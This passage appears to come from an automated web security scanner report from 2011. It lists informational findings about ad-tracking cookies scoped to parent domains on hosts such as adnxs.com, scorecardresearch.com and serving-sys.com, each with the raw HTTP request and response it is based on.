CUqlK6pTR5hWwZKA/2vTlMW5KP8nlUJA0ghGLgKo0mw7K7ldIJDGgt35+98A8BFGuHkaYpjyQv6K3yw7I7DTxyaHys5L8nH5kQAKN3bYKYwjlWBp2N1SgUMI3nI+Cog1m4pF8d9z9xmgld2nyHHdFPNPN6cMyv5q95UqaeXKbbMoW1DWCZyaRTxpTpUv59jUkNuIfK24AUjxGeDuhOr8H5iJ6Jed0O3F4r/0YCsGYGJOx3YXtvXWHgws0N2UBQmJKmxDEOOnMYBplTFEsCuxSiua6b4/y40n8k3S4Svj/LU8Vywx/GY+KvqWkJzzM2QF2z2NaZngQD+ZUuVILb/zzsLyvu+vzkGfYcxC8/Dtr0TTpC57iD72sgltU1Tbp82Kl9OoNo7MKHvxORyvpLnM+wk+V9gxpSUMn3U+jtQ+

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_feb9=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_TE1N=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_RXmH=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_feb9=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_TE1N=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_RXmH=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Jawe="MLsXtSMNJjhrJoHUG+rUxPALFPJgvaBDUoXMlOhbzVGnGpP+GQ2GZoeE5gJ1PPpyT8cbdgJmKm6Uzd+LKsNG9Nr+xb5hoDyIfWhw+AyVQ7u11QLOtzj88u2n9J3K7ReVCPIvh9QMt5DFcvzlWMwCQvebSXlqBAu2RernYAut1MCCV+q/24tw8FoIns/41iDbl7Tc65k6owP7f1eoi+MNbYeWmxZ2RSLSYsDJNVQhhlNlJBAYEQF1IX1fd5O2Lmz0H8o2YtUGzzNsWDIWBrTWenygUIPDIJza9mSq5LtgFoZie4Hj3cJkAASzZoXwejzlDel0cIF7Nybl2UsRTpgSCmcFnLdXIuQ8IiNoLTsPSbI4Yk9w0JKlK27ANpZihZ8/gX34NVR3rHtGa9gdEXZoGBjTf3VemUxRaBoL2vsgAaapfJWjhEizwWUAZsCaP3Bpvruf9ml4bcV0lOwZ6CxPLllW4JquG25Q8PZJub/bTnsWl/VPYGAvcSmXrrZ6IfdMlOAgTHwqZpxEDWGetOJWcFU5WXDn011Ocm7Oe2u9u7U3oBT7zW0MkxEoljqgdc6+7iVt3JwiOqCp3z5+h765zGr4E7B2hemzCGc8uRNtFU6nVK6iLkJy/sbS9yCIPHt+kA7HPfKFzlVvvhfT5GEJC8d9k0L5HCK82AdG4DpU4jOLpz07oKE6KfI6shEnGVMS4HHVVMWxIXGO61OhqXJleJLqCZdo/qJCaxceZ2/AneMa5dtZs3KD3uYQ9JhE9xqB1z7MdKfw4jqStKoC9TdaqXKT6Qpz14fRuCG5BdQjUz1OAuhWlbBuStygfcRLEvRx1Tr/dIWvpUV6mLVQ2HfVUrDKbpSy4WCFLn1yFEnJmyCBXj6CIDHFqm6dP+wjDF3IvmS8r0RVoLD+Xy4UwfJU9LO2O2uCzhfzYvJ6DlP0TyLCI08pGxvusn7MQhu6f8d+gwSO/wuAlFYKT4gUi536pSBPlffZ+hYuM4LUHXumDVUnEne+ZI8wqsnEOkZAf3YdxE2ucgy23gzDtyO/Gv5pknmXVtj5N8GtkD/7XGQ94udBr6Q0l7c3OtvYiqqrnjvE0cRjpWrVvhQ2lPK6bzZhUIz5rSjO6mGN9iCFTTYIeHp0i6Wd6L3jx3qSvh1BESO4AnMK3UDVokDXUESIeawx0wJ70+Jf+OCqte1J/xCixn0kPPZtX3R1QOASxlFw7tJXCNHE0YAW1SuwZeCr52n2uScW8peTuZdaeJn1V9th/CutD/BoEKJv/sFD047122a4o37IufAKNr+54TDtq6hx3mqrEsr7nkWsH0DhRw1lRiFuj4un3R+HDtLIDTsQV9tiJOKFJalV7v/t8CUmO6hrRuJMiFizHlAoUEPQJdMMfuwHZoBBcANP6yjQFTzNHF1HdwzXNsRsiW/dMEjRRfFhZEzzfzMA9Cit6Qj3G77OtyJ+IAtHlJNHMbL5DLxV6e+aDFjLgewz82pakSKJ8ceMMN66JOjNu7zcFjAeOvApEPMygQJzdeWxoaCEj8g/93w9n/jjGmhiSVQ7Dc2KZfhwLdD8hp1Zf5yu2M2ZWMg0IqWeINRtZJw="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="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"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Content-Type: application/x-javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Wed, 06 Jul 2011 14:01:39 GMT
Content-Length: 541

function rsi_img(p,u,c){if(u.indexOf(location.protocol)==0){var i=new Image(2,3);if(c){i.onload=c;}
i.src=u;p[p.length]=i;}}
function rsi_simg(p,s,i){if(i<s.length){rsi_img(p,s[i],function(){rsi_sim
...[SNIP]...

9.6. http://adx.adnxs.com/mapuid previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://adx.adnxs.com
Path:	/mapuid

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

uuid2=3420415245200633085; path=/; expires=Tue, 04-Oct-2011 15:39:08 GMT; domain=.adnxs.com; HttpOnly
uuid2=3420415245200633085; path=/; expires=Tue, 04-Oct-2011 15:39:08 GMT; domain=.adnxs.com; HttpOnly
anj=Kfw)lBAbL-*cOV4KBhCoR25DY(2vp1RESM(2J.fYtvlqPT[cJfVZWo!V7]TG9T)_>#0+zM2gLr6r'WB<PBs]9<X5zx]>^#n%)np%pON9vhK:9sozd5e72axY9NVZ-Im3Zl[S6U?nDk]]Xl0Xr0'9Q2+(5tDV>!8=:3mY$vNb@+D3Ap?G2CBJ4BAix#<U2/j@vzKW10dnb=eCp5B>h>13URKjY5=1]w9C4HMCvuXQGV:it%G2`n9'(TGCQPS<$z^e]Z6NT!6(]HiUVWS)l>c@S8hzH=`<c`vTNPHYaQatBmG@L<igeF=L:^rOE'Hh@#EVR.`=Ux-/<GuTk06++UaGeq'fCBda.X#5PD%g*pg(D*8cY.faZU4k(iYnRV)LFflEn[fHA_LLir)NJ*<UER3ZsiPR>'5esbJ6E8wJTgDvz0]o5KL#F%J7s%dO.T8<793E1psbJ#N3F[i-tl_w_uU>pc>OI(54nFrLmI9z-JW>V/5Y17SfF#Dw)<8nEGEcWzw+u%cChmb4sj7vmp8Od3LAg``vx]:q5^0bCr_Cf.Fhu[tN+9H5I9@_tH4p>Gujl>i$HGt4v8Sw>Lr<m=^M?dyN<JFq0>r=MRS4E+.tPFsOwox/t_9W(AW))oO^b9Xw!u2#qD12xd^$tmhgU5n.:$%hL+W<DJ<:Pz0B98#Xqpp?6Wy9Oa3_U!_mQ0wXAsekf4^D8rmfvGk2vLba!V(^MK7<<jaaH$q-TUqB'0!$_/J2aEL.bEnn+lmE)fcs3@JzL-8_qNIb.7`cZ4G#S'Y?4)j9xsUji[+!jWL:^kCTR)%?W^; path=/; expires=Tue, 04-Oct-2011 15:39:08 GMT; domain=.adnxs.com; HttpOnly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /mapuid?member=181&user=CAESECFrKvBlT-cBj-xM8B2ECfY&cver=1 HTTP/1.1
Host: adx.adnxs.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/iaction/UMIRF_IE9_BOW_Final_InitialView_Home
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIvoIBEAoYASABKAEw3eiy8AQQ3eiy8AQYAA..; sess=1; uuid2=3420415245200633085; anj=Kfw)lBAbL-*cOV4KBhCoR25DY(2vp1RESM(2J.fYtvlqPT[cJfVZWo!V7]TG9T)_>#0+zM2gLr6r'WB<PBs]9<X5zx]>^#n%)np%pON9vhK:9sozd5e72axY9NVZ-Im3Zl[S6U?nDk]]Xl0Xr0'9Q2+(5tDV>!8=:3mY$vNb@+D3Ap?G2CBJ4BAix#<U2/j@vzKW10dnb=eCp5B>h>13URKjY5=1]w9C4HMCvuXQGV:it%G2`n9'(TGCQPS<$z^e]Z6NT!6(]HiUVWS)l>c@S8hzH=`<c`vTNPHYaQatBmG@L<igeF=L:^rOE'Hh@#EVR.`=Ux-/<GuTk06++UaGeq'fCBda.X#5PD%g*pg(D*8cY.faZU4k(iYnRV)LFflEn[fHA_LLir)NJ*<UER3ZsiPR>'5esbJ6E8wJTgDvz0]o5KL#F%J7s%dO.T8<793E1psbJ#N3F[i-tl_w_uU>pc>OI(54nFrLmI9z-JW>V/5Y17SfF#Dw)<8nEGEcWzw+u%cChmb4sj7vmp8Od3LAg``vx]:q5^0bCr_Cf.Fhu[tN+9H5I9@_tH4p>Gujl>i$HGt4v8Sw>Lr<m=^M?dyN<JFq0>r=MRS4E+.tPFsOwox/t_9W(AW))oO^b9Xw!u2#qD12xd^$tmhgU5n.:$%hL+W<DJ<:Pz0B98#Xqpp?6Wy9Oa3_U!_mQ0wXAsekf4^D8rmfvGk2vLba!V(^MK7<<jaaH$q-TUqB'0!$_/J2aEL.bEnn+lmE)fcs3@JzL-8_qNIb.7`cZ4G#S'Y?4)j9xsUji[+!jWL:^kCTR)%?W^

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Thu, 07-Jul-2011 15:39:08 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=3420415245200633085; path=/; expires=Tue, 04-Oct-2011 15:39:08 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=3420415245200633085; path=/; expires=Tue, 04-Oct-2011 15:39:08 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfw)lBAbL-*cOV4KBhCoR25DY(2vp1RESM(2J.fYtvlqPT[cJfVZWo!V7]TG9T)_>#0+zM2gLr6r'WB<PBs]9<X5zx]>^#n%)np%pON9vhK:9sozd5e72axY9NVZ-Im3Zl[S6U?nDk]]Xl0Xr0'9Q2+(5tDV>!8=:3mY$vNb@+D3Ap?G2CBJ4BAix#<U2/j@vzKW10dnb=eCp5B>h>13URKjY5=1]w9C4HMCvuXQGV:it%G2`n9'(TGCQPS<$z^e]Z6NT!6(]HiUVWS)l>c@S8hzH=`<c`vTNPHYaQatBmG@L<igeF=L:^rOE'Hh@#EVR.`=Ux-/<GuTk06++UaGeq'fCBda.X#5PD%g*pg(D*8cY.faZU4k(iYnRV)LFflEn[fHA_LLir)NJ*<UER3ZsiPR>'5esbJ6E8wJTgDvz0]o5KL#F%J7s%dO.T8<793E1psbJ#N3F[i-tl_w_uU>pc>OI(54nFrLmI9z-JW>V/5Y17SfF#Dw)<8nEGEcWzw+u%cChmb4sj7vmp8Od3LAg``vx]:q5^0bCr_Cf.Fhu[tN+9H5I9@_tH4p>Gujl>i$HGt4v8Sw>Lr<m=^M?dyN<JFq0>r=MRS4E+.tPFsOwox/t_9W(AW))oO^b9Xw!u2#qD12xd^$tmhgU5n.:$%hL+W<DJ<:Pz0B98#Xqpp?6Wy9Oa3_U!_mQ0wXAsekf4^D8rmfvGk2vLba!V(^MK7<<jaaH$q-TUqB'0!$_/J2aEL.bEnn+lmE)fcs3@JzL-8_qNIb.7`cZ4G#S'Y?4)j9xsUji[+!jWL:^kCTR)%?W^; path=/; expires=Tue, 04-Oct-2011 15:39:08 GMT; domain=.adnxs.com; HttpOnly
Content-Length: 43
Content-Type: image/gif
Date: Wed, 06 Jul 2011 15:39:08 GMT

GIF89a.............!.......,........@..L..;

9.7. http://b.scorecardresearch.com/b previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/b

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UID=64dfc632-184.84.247.65-1305305561; expires=Fri, 05-Jul-2013 11:22:09 GMT; path=/; domain=.scorecardresearch.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=8&c2=6635176&rn=1308436746&c7=http%3A%2F%2Fbcp.crwdcntrl.net%2F4%2Fc%3D34%257Crand%3D395066690%257Cpv%3Dy%257Crt%3Difr&c9=http%3A%2F%2Fwww.bebo.com%2F&cv=2.2&cs=js HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://bcp.crwdcntrl.net/4/c=34%7Crand=395066690%7Cpv=y%7Crt=ifr
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=64dfc632-184.84.247.65-1305305561

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Wed, 06 Jul 2011 11:22:09 GMT
Connection: close
Set-Cookie: UID=64dfc632-184.84.247.65-1305305561; expires=Fri, 05-Jul-2013 11:22:09 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

9.8. http://b.scorecardresearch.com/p previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/p

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UID=845ba2-96.6.41.192-1309951287; expires=Fri, 05-Jul-2013 11:21:27 GMT; path=/; domain=.scorecardresearch.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /p HTTP/1.1
Host: b.scorecardresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 400 Bad Request
Content-Length: 0
Location: http://b.scorecardresearch.com/p2?
Date: Wed, 06 Jul 2011 11:21:27 GMT
Connection: close
Set-Cookie: UID=845ba2-96.6.41.192-1309951287; expires=Fri, 05-Jul-2013 11:21:27 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

9.9. http://bs.serving-sys.com/BurstingPipe/adServer.bs previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bs.serving-sys.com
Path:	/BurstingPipe/adServer.bs

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

u2=6d1502f0-782c-4c66-9617-aa4652ec4df13IV010; expires=Tue, 04-Oct-2011 07:36:40 GMT; domain=.serving-sys.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /BurstingPipe/adServer.bs?cn=int&iv=2&int=5650363~~0~~~^ebAdDuration~899~0~01020&OptOut=0&ebRandom=0.8620431364979595&flv=10.3181&wmpv=0&res=128 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://pubads.g.doubleclick.net/gampad/ads?correlator=1309951294291&output=html&impl=ifr&client=ca-pub-1767463503520867&slotname=Bebo_Home_300x250_ATFLeft&page_slots=Bebo_Home_300x250_ATFLeft&cust_params=Age%3D&cookie=ID%3D5d1731d2d654c623%3AT%3D1309951294%3AS%3DALNI_MYs8-PBIDTpzhXnmr-Aos6FdpkB-w&cookie_enabled=1&url=http%3A%2F%2Fwww.bebo.com%2F&lmt=1309969296&dt=1309951296825&cc=65&biw=1057&bih=822&ifi=1&adk=491404383&u_tz=-300&u_his=2&u_java=true&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&flash=10.3.181&gads=v2&ga_vid=570193707.1309951297&ga_sid=1309951297&ga_hid=2099858697
Origin: http://pubads.g.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: u2=6d1502f0-782c-4c66-9617-aa4652ec4df13IV010; expires=Tue, 04-Oct-2011 07:36:40 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=FLV=10.3181&RES=128&WMPV=0; expires=Tue, 04-Oct-2011 07:36:40 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Wed, 06 Jul 2011 11:36:39 GMT
Connection: close
Content-Length: 0

9.10. http://bs.serving-sys.com/BurstingPipe/adServer.bs previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bs.serving-sys.com
Path:	/BurstingPipe/adServer.bs

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

A3=gs35b0E.0ca7000009bExaZS0084o00002kYwuaZXq09MY00001h8evaYRd0bI400000lGhvb0Ah0cEt00003lp66b0xe0dMv00002kSEGaZWa03sY00001kPIlaZWa03sY00000kHgIb0v.02WG00001jem9a.2L0c7wa.2L1kFaLa.2L09EZ00001lEOyaYx40cie00001kLQDb0xt0cbO00001h4.ob0xr0ca700002eBxyaZST03iw00001h51Tb0yn0ca700002h51Sb0Ah0ca700001h4.pb0vz0ca700001lzuRa+WF0ckj00001l7XCa+WC08Y500001hePeb0wK0cbO00001lzuXb3sV0ckj00001leMha.2F06hH00001lkqFa.2B06hH00001lFP5aZRG0dSu00001kovFb0xt0cjc00002jDBSaZUd0cbS00001jmcDa.2B0c7w00001kSCsaZWb03sY00001l.wtb0wj07Nz00001jDCqa+WC0cbS00001jDDva+WC0cbS00001jmdZa.2F0c7w00001lGkWb0vy0cEt00001le66b1na02WG00001hePyb0xq0cbO00001gs36b0xr0ca700000lu2rb0yg04m400001iz3QaZRG0bnA00001iyQIaYRd0bnA00001; expires=Tue, 04-Oct-2011 07:21:39 GMT; domain=.serving-sys.com; path=/
B3=78ox0000000001vcawTK0000000002vjatH70000000001vf990p0000000001v5anad0000000001vc835N0000000001vjajpm0000000001vcaJmE0000000001vcaKr10000000001vjaFbT0000000001vm9l7u0000000001vfajpn0000000000vcamoJ0000000001v58SCH0000000001vc9xv30000000001vf9xvo0000000001vc82MD0000000003vj838g0000000001vjafgy0000000001vf8n.z0000000000v99xv40000000001vfaAsi0000000001vf82MC0000000003vkaF580000000001vk9yJj0000000001vj82ME0000000000vj8SC30000000001v99u4N0000000002vjaF7y0000000002v8aHLh0000000002vs9i8L0000000001vf9.360000000001v8awPH0000000001vf838c0000000001vjaKr20000000003vk7dNF0000000001vj4ZUH0000000002vc90mq0000000001v5ajpj0000000001vc82MA0000000000vk; expires=Tue, 04-Oct-2011 07:21:39 GMT; domain=.serving-sys.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2800593&PluID=0&w=300&h=250&ncu=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB3tv7QUUUTsa3EM_ylAekkezuAa3mhMIBo5ejqBCFk__xOwAQARgBIAA4AVCAx-HEBGDJ1vKGyKP8GoIBF2NhLXB1Yi0xNzY3NDYzNTAzNTIwODY3oAGrl7rtA7IBDHd3dy5iZWJvLmNvbboBCjMwMHgyNTBfYXPIAQnaARRodHRwOi8vd3d3LmJlYm8uY29tL5gCxBPAAgXIApWysAvgAgDqAhlCZWJvX0hvbWVfMzAweDI1MF9BVEZMZWZ0qAMB6APCBOgD0wHoA_gD9QMAAIDB4AQBgAbPpJns29D66cwB%26num%3D1%26sig%3DAGiWqtwsO8bMZJ6jQcjqukrS_j5W81cmAg%26client%3Dca-pub-1767463503520867%26adurl%3Dhttp%253A%252F%252Fva.px.invitemedia.com%252Fpixel%253FreturnType%253Dredirect%2526key%253DClick%2526message%253DeJyrVjI2VrJSMDI1NDHQUVAyNgJyzCwNzM1BPEMgRykkI8gtMNDR1d0i0ts0JCfAI6XYs8DR1lYJpBykwNzUyMAcxAPpNQHSpiAzDA0tgUwTIDOvNCcHyDQDiRobWBjXAgC0CRj.%2526redirectURL%253D&ord=ThRFQQAEG8YK5TlPHdsIpA==&ucm=true HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://pubads.g.doubleclick.net/gampad/ads?correlator=1309951294291&output=html&impl=ifr&client=ca-pub-1767463503520867&slotname=Bebo_Home_300x250_ATFLeft&page_slots=Bebo_Home_300x250_ATFLeft&cust_params=Age%3D&cookie=ID%3D5d1731d2d654c623%3AT%3D1309951294%3AS%3DALNI_MYs8-PBIDTpzhXnmr-Aos6FdpkB-w&cookie_enabled=1&url=http%3A%2F%2Fwww.bebo.com%2F&lmt=1309969296&dt=1309951296825&cc=65&biw=1057&bih=822&ifi=1&adk=491404383&u_tz=-300&u_his=2&u_java=true&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&flash=10.3.181&gads=v2&ga_vid=570193707.1309951297&ga_sid=1309951297&ga_hid=2099858697
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C4=; u2=d61a92e1-c563-4003-b380-e6f0a9dbf9f63I308g; ActivityInfo=000dg4csN%5f000db5csN%5f000tbQcu6%5f000rFIcsM%5f000tbRcu6%5f; A3=gs35b0E.0ca7000009bExaZS0084o00002h8evaYRd0bI400000kYwuaZXq09MY00001kSEGaZWa03sY00001lp66b0xe0dMv00002lGhvb0Ah0cEt00003kPIlaZWa03sY00000kFaLa.2L09EZ00001jem9a.2L0c7wa.2L1kHgIb0v.02WG00001kLQDb0xt0cbO00001lEOyaYx40cie00001h51Tb0yn0ca700002eBxyaZST03iw00001h4.ob0xr0ca700002hePeb0wK0cbO00001l7XCa+WC08Y500001lzuRa+WF0ckj00001h4.pb0vz0ca700001h51Sb0Ah0ca700001lFP5aZRG0dSu00001lkqFa.2B06hH00001leMha.2F06hH00001jmcDa.2B0c7w00001jDBSaZUd0cbS00001kovFb0xt0cjc00002l.wtb0wj07Nz00001kSCsaZWb03sY00001le66b1nb02WG00001lGkWb0vy0cEt00001jmdZa.2F0c7w00001jDDva+WC0cbS00001jDCqa+WC0cbS00001hePyb0xq0cbO00001lu2rb0yg04m400001gs36b0xr0ca700000iyQIaYRd0bnA00001lu0naYvn0czN00002iz3QaZRG0bnA00001; B3=78ox0000000001vc835N0000000001vjanad0000000001vc990p0000000001v5atH70000000001vfawTK0000000002vjaFbT0000000001vmaKr10000000001vjaJmE0000000001vcajpm0000000001vcajpn0000000000vc9l7u0000000001vf8SCH0000000001vcamoJ0000000001v59xv30000000001vf9xvo0000000001vc82MD0000000003vjaF580000000001vk82MC0000000003vkaAsi0000000001vf9xv40000000001vf8n.z0000000000v9afgy0000000001vf838g0000000001vj9yJj0000000001vj8SC30000000001v982ME0000000000vjaHLh0000000001vfaF7y0000000002v89u4N0000000002vj838c0000000001vjawPH0000000001vf9.360000000001v89i8L0000000001vf82MA0000000000vkajpj0000000001vc90mq0000000001v54ZUH0000000002vc7dNF0000000001vjaKr20000000003vk

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
